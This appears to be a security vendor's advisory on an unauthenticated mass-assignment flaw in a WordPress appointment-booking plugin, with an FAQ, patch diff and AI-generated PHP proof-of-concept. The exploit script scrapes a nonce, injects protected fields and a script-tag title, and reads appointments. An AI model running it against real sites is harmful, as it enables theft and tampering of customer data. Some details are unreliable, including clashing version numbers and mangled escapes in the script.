What is CVE-2026-42384?

CVE-2026-42384 is a vulnerability in the Simply Schedule Appointments Booking Plugin for WordPress, which allows unauthenticated attackers to expose sensitive information. This vulnerability arises from insufficient authorization checks in the plugin’s REST API, enabling attackers to manipulate appointment data.

Who is affected by this vulnerability?

All users of the Simply Schedule Appointments Booking Plugin versions prior to 1.6.11.2 are affected. If your site is running any version below 1.6.11.2, it is vulnerable to this issue.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin dashboard and navigate to the Plugins section. Look for the Simply Schedule Appointments plugin and verify its version. If it is below 1.6.11.2, your site is at risk.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Simply Schedule Appointments plugin to version 1.6.11.2 or later. This version includes a patch that addresses the security issue by implementing proper authorization checks.

What does the CVSS score of 5.3 mean?

The CVSS score of 5.3 indicates a medium severity level for this vulnerability. This suggests that while the risk is significant, it may not be as critical as higher-scoring vulnerabilities, but it still requires prompt attention to prevent potential data exposure.

What kind of sensitive information can be exposed?

An attacker can potentially access sensitive information such as payment settings, Google Calendar connection details, and personal identifiable information (PII) of customers, including names and email addresses. This could lead to further attacks or data theft.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a POST request to the plugin’s REST API without authentication. It shows how an attacker can manipulate protected fields in the appointment creation process to access sensitive data.

What steps should I take if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the plugin temporarily to prevent exploitation. Additionally, review your site’s access controls and monitor for any suspicious activity related to appointment data.

Are there any other security measures I should implement?

In addition to updating the plugin, ensure that your WordPress installation and all other plugins are up to date. Implement security plugins that can help monitor for vulnerabilities and unauthorized access attempts.

What are the potential consequences of not addressing this vulnerability?

Failing to address this vulnerability could result in unauthorized access to sensitive user data, leading to data breaches, financial fraud, or damage to your organization’s reputation. It is crucial to take prompt action to secure your site.

Where can I find more information about this vulnerability?

More information about CVE-2026-42384 can be found on the National Vulnerability Database (NVD) and security advisories published by the plugin developers. Keeping informed about vulnerabilities helps maintain the security of your WordPress site.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 18, 2026

CVE-2026-42384: Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin < 1.6.11.2 – Unauthenticated Sensitive Information Exposure (simply-schedule-appointments)

CVE ID CVE-2026-42384

Plugin simply-schedule-appointments

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 1.6.11.2

Patched Version 1.6.11.2

Disclosed April 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42384: The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin for WordPress up to version 1.6.11.1 exposes sensitive appointment configuration data to unauthenticated attackers. This is a mass assignment vulnerability in the plugin’s REST API endpoints that handle appointment creation and updates.

Root Cause: The root cause is insufficient authorization checks in the `create_item()` and `update_item()` methods of `class-appointment-model.php` (lines 854-862 and 1149-1157 in the patched version). Before the patch, unauthenticated callers using the public booking nonce or an appointment id_token could submit arbitrary fields in the JSON request body. These fields were directly merged into the database write via `shortcode_atts()` and subsequent save operations. Protected fields like `payment_received`, `title`, `google_calendar_*`, `web_meeting_*`, and `customer_id` had no server-side allowlist filtering.

Exploitation: An attacker can send a POST request to the plugin’s REST API endpoint (typically under `/wp-json/ssa/v1/appointments` or via the WP AJAX handler) with appointment creation parameters. By including protected fields like `customer_id` set to another user’s ID or `payment_received` with a crafted value, the attacker can read or manipulate data that should require administrative privileges. The attack requires no authentication because the plugin’s public booking flow uses a site-wide nonce that unauthenticated visitors can obtain.

Patch Analysis: The patch introduces two new methods: `is_privileged_appointment_request()` and two allowlist functions (`get_unprivileged_create_fields()`, `get_unprivileged_update_fields()`). In `create_item()` and `update_item()`, the code now calls `array_intersect_key($params, array_flip($this->get_unprivileged_create_fields()))` for unprivileged requests, stripping any parameter not in the explicit allowlist. Additionally, a new `sanitize_text_fields()` method sanitizes title and description fields via WordPress’s `sanitize_text_field()` and `sanitize_textarea_field()`, and strips non-scalar values from specific metadata fields.

Impact: An unauthenticated attacker can extract sensitive configuration data such as payment settings, Google Calendar connection details, customer PII (names, emails, phone numbers), and appointment metadata. This could enable further attacks like payment fraud, privilege escalation, or data theft. The CVSS score of 5.3 reflects the potential for significant data exposure.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/simply-schedule-appointments/includes/class-appointment-model.php
+++ b/simply-schedule-appointments/includes/class-appointment-model.php
@@ -49,6 +49,8 @@
 		add_filter( 'ssa/appointment/before_update', array( $this, 'cleanup_customer_information' ), 5, 1 );
 		add_filter( 'ssa/appointment/before_insert', array( $this, 'sanitize_web_meeting_url' ), 6, 1 );
 		add_filter( 'ssa/appointment/before_update', array( $this, 'sanitize_web_meeting_url' ), 6, 1 );
+		add_filter( 'ssa/appointment/before_insert', array( $this, 'sanitize_text_fields' ), 7, 1 );
+		add_filter( 'ssa/appointment/before_update', array( $this, 'sanitize_text_fields' ), 7, 1 );
 		add_filter( 'ssa/appointment/before_update', array( $this, 'prevent_canceling_a_reserved_appointment' ), 1, 2 );

 		add_filter( 'ssa/appointment/before_insert', array( $this, 'default_appointment_status' ), 5, 1 );
@@ -243,6 +245,128 @@
 		return $data;
 	}

+	/**
+	 * Sanitize free-text appointment fields that should never contain HTML.
+	 *
+	 * These fields are persisted and later rendered in ICS files, notification
+	 * emails, and calendar integrations, so HTML/JS in them is always unsafe.
+	 *
+	 * @param array $data
+	 * @return array
+	 */
+	public function sanitize_text_fields( $data ) {
+		if ( isset( $data['title'] ) && is_string( $data['title'] ) ) {
+			$data['title'] = sanitize_text_field( $data['title'] );
+		}
+		// description is a TEXT column and may legitimately contain newlines,
+		// so use the textarea variant that preserves them.
+		if ( isset( $data['description'] ) && is_string( $data['description'] ) ) {
+			$data['description'] = sanitize_textarea_field( $data['description'] );
+		}
+
+		// A few schema columns are scalar strings in practice but reach this
+		// filter straight from JSON, so a caller can slip in a nested array
+		// or object. Drop anything non-scalar on the short VARCHAR/TINYTEXT
+		// columns before it hits $wpdb->prepare with a %s format.
+		foreach ( array( 'status', 'payment_method', 'customer_timezone', 'customer_locale', 'allow_sms' ) as $field ) {
+			if ( isset( $data[ $field ] ) && ! is_scalar( $data[ $field ] ) ) {
+				unset( $data[ $field ] );
+			}
+		}
+
+		return $data;
+	}
+
+	/**
+	 * Whether the current request has admin-level access to appointments.
+	 *
+	 * Unprivileged callers reach create_item/update_item via either the
+	 * site-wide public nonce or an appointment id_token; both grant the
+	 * ability to book/edit but must not be able to set protected fields.
+	 *
+	 * @return bool
+	 */
+	public function is_privileged_appointment_request() {
+		if ( current_user_can( 'ssa_manage_others_appointments' ) ) {
+			return true;
+		}
+		if ( current_user_can( 'ssa_manage_appointments' ) ) {
+			return true;
+		}
+
+		return false;
+	}
+
+	/**
+	 * Fields an unprivileged caller is allowed to submit when creating an
+	 * appointment. Anything else in the request body is silently dropped
+	 * before it reaches the database insert.
+	 *
+	 * @return array
+	 */
+	public function get_unprivileged_create_fields() {
+		return array(
+			// schema columns the booking flow legitimately writes
+			'appointment_type_id',
+			'start_date',
+			'customer_information',
+			'customer_timezone',
+			'customer_locale',
+			'payment_method',
+			'status',
+			'allow_sms',
+			'mailchimp_list_id',
+
+			// non-schema params consumed by create_item's own control flow.
+			// customer_id is intentionally NOT listed: create_item derives it
+			// from the customer email or the logged-in user, so allowing the
+			// client to send it would let an attacker spoof ownership.
+			// rescheduled_from_appointment_id is intentionally NOT listed:
+			// update_rescheduled_to_appointment_id reassigns that appointment's
+			// payment rows to the new appointment without an ownership check,
+			// so an unprivileged caller who set it to a victim's id could
+			// transfer the victim's payments onto their own booking.
+			'post_information',
+			'fetch',
+			'mepr_membership',
+			'staff_ids',
+			'selected_resources',
+			'opt_in_notifications',
+		);
+	}
+
+	/**
+	 * Fields an unprivileged caller is allowed to submit when updating an
+	 * appointment. Matches the booking app's client-side `bookingProps`
+	 * allowlist plus the request-routing params used by update_item.
+	 *
+	 * @return array
+	 */
+	public function get_unprivileged_update_fields() {
+		return array(
+			// request routing / auth
+			'id',
+			'token',
+			'fetch',
+
+			// schema columns the booking flow legitimately writes.
+			// appointment_type_id is intentionally NOT listed on update:
+			// changing the type on an existing appointment can interact
+			// poorly with payment state (e.g. leave a pending_payment
+			// booking stuck after swapping to a free type). update_item
+			// falls back to the stored type when this is absent.
+			'customer_information',
+			'status',
+			'start_date',
+			'payment_method',
+
+			// non-schema booking-app params
+			'staff_ids',
+			'selected_resources',
+			'rescheduling_note',
+		);
+	}
+
 	public function default_appointment_status( $data ) {
 		// We want to allow "pending_form" status if it's provided
 		if ( ! empty( $data['status'] ) && $data['status'] === 'pending_form' ) {
@@ -847,6 +971,14 @@

 	public function create_item( $request ) {
 		$params = $request->get_params();
+
+		// Block mass assignment: unprivileged callers (booking flow, public nonce)
+		// must not be able to set protected fields like payment_received, title,
+		// google_calendar_*, web_meeting_*, etc.
+		if ( ! $this->is_privileged_appointment_request() ) {
+			$params = array_intersect_key( $params, array_flip( $this->get_unprivileged_create_fields() ) );
+		}
+
 		$params = shortcode_atts(
 			array_merge(
 				$this->get_field_defaults(),
@@ -1014,10 +1146,17 @@
 	}

 	public function update_item( $request ) {
-
+
 		$item_id = $request['id'];
 		$params  = $request->get_params();
-
+
+		// Block mass assignment: unprivileged callers (id_token / customer edit)
+		// must not be able to set protected fields like payment_received, title,
+		// google_calendar_*, web_meeting_*, etc.
+		if ( ! $this->is_privileged_appointment_request() ) {
+			$params = array_intersect_key( $params, array_flip( $this->get_unprivileged_update_fields() ) );
+		}
+
 		if ( ! empty( $params['appointment_type_id'] ) ) {
 			$appointment_type = new SSA_Appointment_Type_Object( $params['appointment_type_id'] );
 		} else {
--- a/simply-schedule-appointments/includes/class-elementor.php
+++ b/simply-schedule-appointments/includes/class-elementor.php
@@ -20,7 +20,7 @@
 	 *
 	 * @var string The plugin version.
 	 */
-	const VERSION = '1.6.11.0';
+	const VERSION = '1.6.11.2';

 	/**
 	 * Minimum Elementor Version
@@ -29,7 +29,7 @@
 	 *
 	 * @var string Minimum Elementor version required to run the plugin.
 	 */
-	const MINIMUM_ELEMENTOR_VERSION = '1.6.11.0';
+	const MINIMUM_ELEMENTOR_VERSION = '1.6.11.2';

 	/**
 	 * Minimum PHP Version
@@ -38,7 +38,7 @@
 	 *
 	 * @var string Minimum PHP version required to run the plugin.
 	 */
-	const MINIMUM_PHP_VERSION = '1.6.11.0';
+	const MINIMUM_PHP_VERSION = '1.6.11.2';

 	/**
 	 * Instance
--- a/simply-schedule-appointments/includes/class-notifications.php
+++ b/simply-schedule-appointments/includes/class-notifications.php
@@ -468,6 +468,16 @@
 			return false;
 		}

+		// Async actions can be queued with a delay, and the row may be gone
+		// by the time cron fires (test teardown, group cleanup, reschedule).
+		// Skip the notification rather than fataling inside template rendering.
+		// db_get_field avoids the notice cascade that a full get() would trip
+		// when walking an empty row's relationships.
+		$existing_id = $this->plugin->appointment_model->db_get_field( 'id', $payload['appointment']['id'] );
+		if ( empty( $existing_id ) ) {
+			return false;
+		}
+
 		$settings = $this->plugin->settings->get();
 		$notifications = $this->plugin->notifications_settings->get_notifications();
 		sleep(1); // Throttle emails for shared hosts and prevent race condition with Google Meet web meeting urls
--- a/simply-schedule-appointments/includes/class-paypal-ipn-listener.php
+++ b/simply-schedule-appointments/includes/class-paypal-ipn-listener.php
@@ -23,7 +23,7 @@
 	 *  @package    PHP-PayPal-IPN
 	 *  @author     Micah Carrick
 	 *  @copyright  (c) 2011 - Micah Carrick
-	 *  @version    1.6.11.0
+	 *  @version    1.6.11.2
 	 *  @license    http://opensource.org/licenses/gpl-3.0.html
 	 */

--- a/simply-schedule-appointments/simply-schedule-appointments.php
+++ b/simply-schedule-appointments/simply-schedule-appointments.php
@@ -3,7 +3,7 @@
  * Plugin Name: Simply Schedule Appointments
  * Plugin URI:  https://simplyscheduleappointments.com
  * Description: Easy appointment scheduling
- * Version:     1.6.11.0
+ * Version:     1.6.11.2
  * Requires PHP: 7.4
  * Author:      NSquared
  * Author URI:  https://nsquared.io/
@@ -15,7 +15,7 @@
  * @link    https://simplyscheduleappointments.com
  *
  * @package Simply_Schedule_Appointments
- * @version 1.6.11.0
+ * @version 1.6.11.2
  *
  * Built using generator-plugin-wp (https://github.com/WebDevStudios/generator-plugin-wp)
  */
@@ -206,7 +206,7 @@
 	 * @var    string
 	 * @since  0.0.0
 	 */
-	const VERSION = '1.6.11.0';
+	const VERSION = '1.6.11.2';

 	/**
 	 * URL of plugin directory.
--- a/simply-schedule-appointments/vendor/composer/installed.php
+++ b/simply-schedule-appointments/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => '__root__',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => '8beae35c7a93a99d205b68bb2d9bbf146ddfb51a',
+        'reference' => 'cd5698c777414f7a2c3dfa59cdc08fe72d31ffde',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         '__root__' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => '8beae35c7a93a99d205b68bb2d9bbf146ddfb51a',
+            'reference' => 'cd5698c777414f7a2c3dfa59cdc08fe72d31ffde',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-42384 - Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin < 1.6.11.2 - Unauthenticated Sensitive Information Exposure

// Configuration
$target_url = 'http://example.com'; // Change to target WordPress site
$api_endpoint = $target_url . '/wp-json/ssa/v1/appointments';

// Step 1: Obtain the public nonce (often embedded in the booking page)
// In production, you might scrape this from the page source
$booking_page = file_get_contents($target_url . '/appointments/');
preg_match('/"ssa_nonce":"([a-f0-9]+)"/', $booking_page, $matches);
$nonce = $matches[1] ?? 'test_nonce';

echo "[+] Using nonce: $noncen";

// Step 2: Attempt to create an appointment with protected fields
// Vulnerable: unauthenticated requests accept arbitrary fields
$payload = array(
    'action' => 'ssa_appointment_create',
    '_nonce' => $nonce,
    'appointment_type_id' => 1,
    'start_date' => '2025-01-01T10:00:00',
    'customer_information' => array(
        'Name' => 'Attacker',
        'Email' => 'attacker@example.com'
    ),
    // Protected fields - should be blocked but are not
    'customer_id' => 123, // Victim user ID
    'payment_received' => '100.00',
    'title' => '<script>alert(1)</script>',
);

$ch = curl_init($api_endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $nonce
));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Response Code: $http_coden";
echo "[+] Response:n$responsen";

// Step 3: Extraction attempt - Read existing appointments
$read_url = $target_url . '/wp-json/ssa/v1/appointments?per_page=50';
$ch = curl_init($read_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'X-WP-Nonce: ' . $nonce
));
$appointments = curl_exec($ch);
curl_close($ch);

echo "[+] Read appointments:n$appointmentsn";
?>

Frequently Asked Questions

What is CVE-2026-42384?
Understanding the vulnerability
CVE-2026-42384 is a vulnerability in the Simply Schedule Appointments Booking Plugin for WordPress, which allows unauthenticated attackers to expose sensitive information. This vulnerability arises from insufficient authorization checks in the plugin’s REST API, enabling attackers to manipulate appointment data.
Who is affected by this vulnerability?
Identifying impacted users
All users of the Simply Schedule Appointments Booking Plugin versions prior to 1.6.11.2 are affected. If your site is running any version below 1.6.11.2, it is vulnerable to this issue.
How can I check if my site is vulnerable?
Verifying your plugin version
To check if your site is vulnerable, log in to your WordPress admin dashboard and navigate to the Plugins section. Look for the Simply Schedule Appointments plugin and verify its version. If it is below 1.6.11.2, your site is at risk.
How can I fix this vulnerability?
Applying the necessary patch
To mitigate this vulnerability, update the Simply Schedule Appointments plugin to version 1.6.11.2 or later. This version includes a patch that addresses the security issue by implementing proper authorization checks.
What does the CVSS score of 5.3 mean?
Understanding the severity rating
The CVSS score of 5.3 indicates a medium severity level for this vulnerability. This suggests that while the risk is significant, it may not be as critical as higher-scoring vulnerabilities, but it still requires prompt attention to prevent potential data exposure.
What kind of sensitive information can be exposed?
Potential data risks
An attacker can potentially access sensitive information such as payment settings, Google Calendar connection details, and personal identifiable information (PII) of customers, including names and email addresses. This could lead to further attacks or data theft.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation method
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a POST request to the plugin’s REST API without authentication. It shows how an attacker can manipulate protected fields in the appointment creation process to access sensitive data.
What steps should I take if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider disabling the plugin temporarily to prevent exploitation. Additionally, review your site’s access controls and monitor for any suspicious activity related to appointment data.
Are there any other security measures I should implement?
Enhancing overall security
In addition to updating the plugin, ensure that your WordPress installation and all other plugins are up to date. Implement security plugins that can help monitor for vulnerabilities and unauthorized access attempts.
What are the potential consequences of not addressing this vulnerability?
Understanding the risks of inaction
Failing to address this vulnerability could result in unauthorized access to sensitive user data, leading to data breaches, financial fraud, or damage to your organization’s reputation. It is crucial to take prompt action to secure your site.
Where can I find more information about this vulnerability?
Resources for further learning
More information about CVE-2026-42384 can be found on the National Vulnerability Database (NVD) and security advisories published by the plugin developers. Keeping informed about vulnerabilities helps maintain the security of your WordPress site.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations